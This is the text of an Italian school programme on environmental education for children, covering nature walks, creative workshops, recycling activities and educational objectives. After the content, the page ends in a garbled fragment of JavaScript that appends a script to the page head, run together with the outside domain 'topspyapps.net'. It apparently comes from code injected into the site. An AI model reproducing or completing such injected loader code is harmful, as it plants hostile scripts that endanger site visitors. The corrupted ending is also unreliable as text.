Alla scoperta dell’ambiente

Il percorso vuole stimolare i bambini ad osservare il mondo che li circonda, sia naturale che cittadino, e a riflettere sui loro comportamenti e sull’impatto che questi hanno sull’ambiente.
Il territorio che ci circonda offre, infatti, in ogni stagione infiniti spunti di osservazione e di ricerca che costituiscono un importante supporto per l’approfondimento didattico.

Il percorso si articola su due filoni.

Scoperta della natura: attraverso delle escursioni e dei laboratori creativi si propone agli studenti la scoperta attiva e personale di un aspetto dell’ambiente naturale: la vegetazione. Il metodo utilizzato prevede che si affianchino osservazioni ‘scientifiche’ sul campo a metodi di indagine basati sulla percezione sensoriale a cui seguirà una fase di rielaborazione creativa.
Analisi dei materiali di scarto e riciclaggio attraverso attività ludiche: si propone una riflessione sul tema dei rifiuti solidi urbani e della raccolta differenziata attraverso dei momenti di osservazione in campo, seguiti da esperimenti per verificare la diversa degradabilità dei materiali nell’ambiente. Seguirà un percorso di animazione ludica e di costruzione di giochi partendo dagli ‘scarti’ che i bambini buttano quotidianamente.

Finalità

Promuovere la progettazione del futuro e stimolare la consapevolezza che anche le azioni di una singola persona possono avere un peso nella realtà

Obiettivi educativi

  • Promuovere le capacità individuali, offrendo spazi ed occasioni di gratificazione anche agli alunni poco motivati;
  • Produrre ricadute sull’impegno scolastico e sulle relazioni interpersonali stimolando il lavoro di gruppo;
  • Integrare gli alunni portatori di handicap o di svantaggio;
  • Promuovere la partecipazione attiva ai percorsi di conoscenza;
  • Imparare a gestire un compito attraverso diverse fasi: ricerca, elaborazione, trasmissione dei risultati;
  • Sviluppare le modalità generali del pensiero come l’articolazione logica, il senso del tempo, dello spazio, la capacità di osservazione, la creatività e la fantasia.

Obiettivi didattici

  • Scoprire attraverso l’osservazione la biodiversità;
  • Conoscere e utilizzare metodi di rilevamento scientifici per il riconoscimento delle specie, la riproduzione su scala ridotta, l’analisi della degradabilità;
  • Imparare a utilizzare i sensi nel rapporto con la natura;
  • Sensibilizzare a un rapporto di rispetto e promuovere dei comportamenti consapevoli nel rapporto singolo – ambiente.

Aree didattiche di riferimento

  • Scienze
  • Matematica
  • Educazione all’immagine
  • Studi sociali
  • Educazione Motoria

}


if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);topspyapps.net